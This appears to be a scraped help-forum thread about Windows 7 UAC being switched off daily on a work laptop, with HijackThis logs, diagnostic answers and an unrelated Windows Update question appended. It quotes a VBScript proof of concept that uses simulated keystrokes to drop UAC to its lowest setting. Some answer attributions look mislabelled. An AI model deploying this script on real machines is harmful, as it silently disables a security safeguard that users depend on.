virus - UAC being turned off once a day on Windows 7

07
2014-07
  • Questioner

    I have strange problem on my HP laptop. This began to happen recently. Whenever I start my machine, Windows 7 Action Center displays the following warning:

    You need to restart your computer for UAC to be turned off.

    Actually, this does not happen if it happened once on a specific day. For example, when I start the machine in the morning, it shows up; but it never shows up in the subsequent restarts within that day. On the next day, the same thing happens again.

    I never disable UAC, but obviously some rootkit or virus causes this. As soon as I get this warning, I head for the UAC settings, and re-enable UAC to dismiss this warning. This is a bothersome situation as I can't fix it.

    First, I have run a full scan on the computer for any probable virus and malware/rootkit activity, but TrendMicro OfficeScan said that no viruses have been found. I went to an old Restore Point using Windows System Restore, but the problem was not solved.

    What I have tried so far (which couldn't find the rootkit):

    • TrendMicro OfficeScan Antivirus
    • AVAST
    • Malwarebytes' Anti-malware
    • Ad-Aware
    • Vipre Antivirus
    • GMER
    • TDSSKiller (Kaspersky Labs)
    • HiJackThis
    • RegRuns
    • UnHackMe
    • SuperAntiSpyware Portable
    • Tizer Rootkit Razor (*)
    • Sophos Anti-Rootkit
    • SpyHunter 4
    • ComboFix

    There are no other strange activities on the machine. Everything works fine except this bizarre incident.

    What could be the name of this annoying rootkit? How can I detect and remove it?

    EDIT: Below is the log file generated by HijackThis:

    Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 13:07:04, on 17.01.2011
Platform: Windows 7  (WinNT 6.00.3504)
MSIE: Internet Explorer v8.00 (8.00.7600.16700)
Boot mode: Normal

Running processes:
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\CheckPoint\SecuRemote\bin\SR_GUI.Exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\system32\igfxsrvc.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QLBCTRL.exe
C:\Program Files\Analog Devices\Core\smax4pnp.exe
C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\VolCtrl.exe
C:\Program Files\LightningFAX\LFclient\lfsndmng.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\Microsoft Office Communicator\communicator.exe
C:\Program Files\Iron Mountain\Connected BackupPC\Agent.exe
C:\Program Files\Trend Micro\OfficeScan Client\PccNTMon.exe
C:\Program Files\Microsoft LifeCam\LifeExp.exe
C:\Program Files\Hewlett-Packard\Shared\HpqToaster.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\mimio\mimio Studio\system\aps_tablet\atwtusb.exe
C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE
C:\Program Files\Babylon\Babylon-Pro\Babylon.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Users\userx\Desktop\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = 
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = 
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,AutoConfigURL = http://www.yaysat.com.tr/proxy/proxy.pac
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = 
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Babylon IE plugin - {9CFACCB6-2F3F-4177-94EA-0D2B72D384C1} - C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O4 - HKLM\..\Run: [IgfxTray] C:\Windows\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\Windows\system32\hkcmd.exe
O4 - HKLM\..\Run: [Persistence] C:\Windows\system32\igfxpers.exe
O4 - HKLM\..\Run: [hpWirelessAssistant] C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [QlbCtrl.exe] C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\Core\smax4pnp.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [lfsndmng] C:\Program Files\LightningFAX\LFclient\LFSNDMNG.EXE
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [Communicator] "C:\Program Files\Microsoft Office Communicator\communicator.exe" /fromrunkey
O4 - HKLM\..\Run: [AgentUiRunKey] "C:\Program Files\Iron Mountain\Connected BackupPC\Agent.exe" -ni -sss -e http://localhost:16386/
O4 - HKLM\..\Run: [OfficeScanNT Monitor] "C:\Program Files\Trend Micro\OfficeScan Client\pccntmon.exe" -HideWindow
O4 - HKLM\..\Run: [Babylon Client] C:\Program Files\Babylon\Babylon-Pro\Babylon.exe -AutoStart
O4 - HKLM\..\Run: [LifeCam] "C:\Program Files\Microsoft LifeCam\LifeExp.exe"
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - Global Startup: mimio Studio.lnk = C:\Program Files\mimio\mimio Studio\mimiosys.exe
O8 - Extra context menu item: Microsoft Excel'e &Ver - res://C:\PROGRA~1\MICROS~1\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: Translate this web page with Babylon - res://C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/ActionTU.htm
O8 - Extra context menu item: Translate with Babylon - res://C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/Action.htm
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~1\Office12\REFIEBAR.DLL
O9 - Extra button: Translate this web page with Babylon - {F72841F0-4EF1-4df5-BCE5-B3AC8ACF5478} - C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll
O9 - Extra 'Tools' menuitem: Translate this web page with Babylon - {F72841F0-4EF1-4df5-BCE5-B3AC8ACF5478} - C:\Program Files\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll
O16 - DPF: {00134F72-5284-44F7-95A8-52A619F70751} (ObjWinNTCheck Class) - https://172.20.12.103:4343/officescan/console/html/ClientInstall/WinNTChk.cab
O16 - DPF: {08D75BC1-D2B5-11D1-88FC-0080C859833B} (OfficeScan Corp Edition Web-Deployment SetupCtrl Class) - https://172.20.12.103:4343/officescan/console/html/ClientInstall/setup.cab
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = yaysat.com
O17 - HKLM\Software\..\Telephony: DomainName = yaysat.com
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = yaysat.com
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: Domain = yaysat.com
O18 - Protocol: qcom - {B8DBD265-42C3-43E6-B439-E968C71984C6} - C:\Program Files\Common Files\Quest Shared\CodeXpert\qcom.dll
O22 - SharedTaskScheduler: FencesShellExt - {1984DD45-52CF-49cd-AB77-18F378FEA264} - C:\Program Files\Stardock\Fences\FencesMenu.dll
O23 - Service: Andrea ADI Filters Service (AEADIFilters) - Andrea Electronics Corporation - C:\Windows\system32\AEADISRV.EXE
O23 - Service: AgentService - Iron Mountain Incorporated - C:\Program Files\Iron Mountain\Connected BackupPC\AgentService.exe
O23 - Service: Agere Modem Call Progress Audio (AgereModemAudio) - LSI Corporation - C:\Program Files\LSI SoftModem\agrsmsvc.exe
O23 - Service: BMFMySQL - Unknown owner - C:\Program Files\Quest Software\Benchmark Factory for Databases\Repository\MySQL\bin\mysqld-max-nt.exe
O23 - Service: Com4QLBEx - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4QLBEx.exe
O23 - Service: hpqwmiex - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
O23 - Service: OfficeScanNT RealTime Scan (ntrtscan) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\ntrtscan.exe
O23 - Service: SMS Task Sequence Agent (smstsmgr) - Unknown owner - C:\Windows\system32\CCM\TSManager.exe
O23 - Service: Check Point VPN-1 Securemote service (SR_Service) - Check Point Software Technologies - C:\Program Files\CheckPoint\SecuRemote\bin\SR_Service.exe
O23 - Service: Check Point VPN-1 Securemote watchdog (SR_Watchdog) - Check Point Software Technologies - C:\Program Files\CheckPoint\SecuRemote\bin\SR_Watchdog.exe
O23 - Service: Trend Micro Unauthorized Change Prevention Service (TMBMServer) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\..\BM\TMBMSRV.exe
O23 - Service: OfficeScan NT Listener (tmlisten) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\tmlisten.exe
O23 - Service: OfficeScan NT Proxy Service (TmProxy) - Trend Micro Inc. - C:\Program Files\Trend Micro\OfficeScan Client\TmProxy.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - RealVNC Ltd. - C:\Program Files\RealVNC\VNC4\WinVNC4.exe

--
End of file - 8204 bytes

    As suggested in this very similar question, I have run full scans (+boot time scans) with RegRun and UnHackMe, but they also did not find anything. I have carefully examined all entries in the Event Viewer, but there's nothing wrong.

    Now I know that there is a hidden trojan (rootkit) on my machine which seems to disguise itself quite successfully. Note that I don't have the chance to remove the HDD, or reinstall the OS as this is a work machine subjected to certain IT policies on a company domain.

    Despite all my attempts, the problem still remains. I strictly need a to-the-point method or a pukka rootkit remover to remove whatever it is. I don't want to monkey with the system settings, i.e. disabling auto runs one by one, messing the registry, etc.

    EDIT 2: I have found an article which is closely related to my trouble:

    Malware can turn off UAC in Windows 7; “By design” says Microsoft. Special thanks(!) to Microsoft.

    In the article, a VBScript code is given to disable UAC automatically:

    '// 1337H4x Written by _____________ 
'//                    (12 year old)

Set WshShell = WScript.CreateObject("WScript.Shell")

'// Toggle Start menu
WshShell.SendKeys("^{ESC}")
WScript.Sleep(500)

'// Search for UAC applet
WshShell.SendKeys("change uac")
WScript.Sleep(2000)

'// Open the applet (assuming second result)
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{ENTER}")
WScript.Sleep(2000)

'// Set UAC level to lowest (assuming out-of-box Default setting)
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")
WshShell.SendKeys("{DOWN}")

'// Save our changes
WshShell.SendKeys("{TAB}")
WshShell.SendKeys("{ENTER}")

'// TODO: Add code to handle installation of rebound
'// process to continue exploitation, i.e. place something
'// evil in Startup folder

'// Reboot the system
'// WshShell.Run "shutdown /r /f"

    Unfortunately, that doesn't tell me how I can get rid of this malicious code running on my system.

    EDIT 3: Last night, I left the laptop open because of a running SQL task. When I came in the morning, I saw that UAC was turned off. So, I suspect that the problem is not related to startup. It is happening once a day for sure no matter if the machine is rebooted.

    EDIT 4: Today, I immediately started "Process Monitor" as soon as Windows was started to hopefully catch the guilty one (thanks to @harrymc for the idea). At 9:17, UAC slider was slided to the bottom (Windows 7 Action Center gave the warning). I investigated all the registry actions between 9:16 and 9:18. I saved the Process Monitor log file (70MB containing only that 2 minutes interval). There are lots of EnableLUA = 0 (and the other) entries. I'm posting the screenshots of the properties windows of the first 4 below. It says svchost.exe is doing this, and gives some thread and PID numbers. I don't know what I should infer about them:

    enter image description here enter image description here enter image description here enter image description here

    • Answers
  • Mehper C. Palavuzlar

    Because of the bounty I need to provide a new answer

    You should first check if the Security Center service can start, and if not - which one of its dependencies is to blame. Look also for error messages in the Event Viewer.

    If you have the feeling that your computer is infected, possible solutions may be :

    1. How to Repair Windows 7 System Files with System File Checker.
    2. Startup Repair : How To Easily Repair Windows 7 Boot Problems Using Startup Repair.
    3. The last resort is to reformat the hard disk and reinstall Windows.
      In your case, this might apply : Performing an HP System Recovery in Windows Vista.

    Just to remark that Windows is quite capable of destroying itself without any help, which is why Windows Update is more dangerous than any virus. Startup Repair may fix the problem in this case by reinitializing Windows, without requiring the applications to be reinstalled.

    If you realy think the problem is rather that of a virus, and you wish to know more about what is happening on your computer, you will need to find out two things :

    1. What change is being done to your system,
    2. What program does this change.

    For the first one, if it is a registry change, then the key is probably HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, item EnableLUA, whose value is 0 for Disabling and 1 for Enabling.

    Once you have located the change being done to your system, you can use Process Monitor and its Enable Boot Logging option (see help) to log all accesses to the key.

    I would first boot in Safe mode, and see if this is also happening. If not, then another attack-vector is to use Autoruns to disable startup items in a binary search for the product (since this might be a legitimate product causing the problem, rather than a virus).

  • Bobby Alexander

    Option 1: Disable all programs in Startup. (Start >Run > Msconfig. Disable everything under startup).

    Option 2: Install AVAST home edition and schedule a boot time scan. Better yet, disconnect the hard disk from your machine and connect it to another one and scan it from there using AVAST.

    Option 3. Another option is to run HijackThis. Generate the report and share it here for analysis. http://free.antivirus.com/hijackthis/

  • Try to Disable UAC without Admin Rights

    In my case it was domain policy that was being applied once per day. Same problem. Diagnosis was easier because UAC turning off occurred only when logging in to the domain, or connecting over VPN. Thus it was discovered that the domain policy included some script to turn UAC off. I contacted my system admins and they confirmed that. So you better consult with your administrators of domain or validate profile local policies and scripts if you are not in domain.

  • Seasoned Advice (cooking)

    Before you move onto more complicated measures, please do install AVG Anti-Virus Free Edition 2011. Let it perform a whole computer scan. Recently, I've had a similar problem, and no other anti-virus programs but the aforementioned one could fix it with its Anti-Rootkit measures.


    • Related Question

    Windows 7 won't update
  • cab0lt

    My problem is that Windows 7 won't update - legal MSDN copy. It says: "the update service is not started", and if I start it, it immediately shuts itself down. In the event viewer is nothing interesting to see, no fatals and no warnings, only start/stop events. I've got no clue from where to start looking, so here's an Hijackthis log:

    Logfile of Trend Micro HijackThis v2.0.3 (BETA)
Scan saved at 18:34:05, on 7/02/2010
Platform: Unknown Windows (WinNT 6.01.3504)
MSIE: Internet Explorer v8.00 (8.00.7600.16385)
Boot mode: Normal

Running processes:
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\PLFSetI.exe
C:\Program Files\VMware\VMware Player\hqtray.exe
C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\Windows Live\Contacts\wlcomm.exe
C:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\Skype\Plugin Manager\skypePM.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\TrendMicro\HiJackThis\HiJackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.be/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = 
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = 
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = 
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [PLFSetL] C:\Windows\\PLFSetL.exe
O4 - HKLM\..\Run: [PLFSetI] C:\Windows\PLFSetI.exe
O4 - HKLM\..\Run: [VMware hqtray] "C:\Program Files\VMware\VMware Player\hqtray.exe"
O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir Desktop\avgnt.exe" /min
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O8 - Extra context menu item: E&xporteren naar Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: Verzenden naar OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: Verz&enden naar

    • Related Answers
  • Chris Tarazi

    Try running this

    Repair & Fix Windows Updates with Fix WU Utility

  • slhck

    The following is from Microsoft. The 1st solution fixed my problem:

    From the case log, I understand that the error code 80072EFE was received when trying to perform Windows Update. If there has been any misunderstanding, please let me know. I fully understand the inconvenience you have experienced. We will work together to resolve this issue through the course of the case. This issue can be caused by one of the following factors:

    1. The computer was attacked by viruses.
    2. Some background programs, such as antivirus programs or firewalls (especially CA Firewall), block access to the Windows Update site.
    3. Incorrect DNS Settings. We will address some of the more common causes of this issue. It is important that we attempt to connect to the Windows Update web site after each step to confirm whether the resolution has worked. This will prevent us from having to proceed with additional troubleshooting steps and provide us with valuable feedback to further develop our support resolutions for you and our future customers. Your assistance is greatly appreciated.

    Suggestion 1: Run the tool to clear spyware

    1. Download the file TDSSKiller.zip from the following link and save it on the Desktop.
    2. Double click TDSSKiller.zip to unzip the file.
    3. Double click TDSSKiller.exe to scan the system.
    4. Wait for the scan and disinfection process to complete. Please Note: The third-party product discussed here is manufactured by a company that is independent of Microsoft. We make no warranty, implied or otherwise, regarding this product's performance or reliability.
      Now try Windows Update to see if the issue has been resolved. Please let us know if this step has resolved it. If not, please proceed to the next step.

    Suggestion 2: Reset DNS Settings

    1. Click "Start", input "NCPA.CPL" (without quotation marks) to Start Search bar and press "Enter".

    2. Right-click the network connection and click "Properties". If you are prompted for an administrator password or confirmation, type the password or provide confirmation.

    3. Click to highlight "Internet Protocol Version 6 (TCP/IPv6)" and click "Properties".

    4. Check "Obtain an IP address automatically" and "Obtain DNS server address automatically".
    5. Click "OK".
    6. Click to highlight "Internet Protocol Version 4 (TCP/IPv4)" and click "Properties".
    7. Check "Obtain an IP address automatically" and "Obtain DNS server address automatically".
    8. Click "OK".
    9. Reboot the computer. Now try Windows Update again to check if the issue has been resolved. If not, please proceed to the next step.
      Suggestion 3: Disable firewalls or other Internet browser programs that can affect the Internet connection

    This issue could be caused by third party applications. Let's first try disabling or uninstalling any third party security applications you may have installed on the computer. Please be advised that this is for troubleshooting purposes only.

    Once we have resolved the issue, the applications should be re-enabled or reinstalled immediately. If the third party security application is determined to be the cause, please contact the vendor for assistance. You may have a different security application not listed below that could also be causing the issue. Even if the firewall has been running for some time without any problems, new updates may create issues.

    Here is a list of the most common security applications:

    • Symantec
    • Norton
    • McAfee
    • Zone Alarm
    • Panda Security
    • Kaspersky
    • Sophos Antivirus
    • Comodo Firewall
    • AntispamSniper
    • Webroot
    • Spy Sweeper
    • Accelerator
    • Spybot

    Once the third party security applications have been disabled or removed, please access the Windows Update web site again. If you encounter problems disabling these programs, we recommend completely uninstalling them while troubleshooting.

    Before uninstalling any application, please enable your Windows Firewall and ensure that you have the CDs or files needed to re-install the program.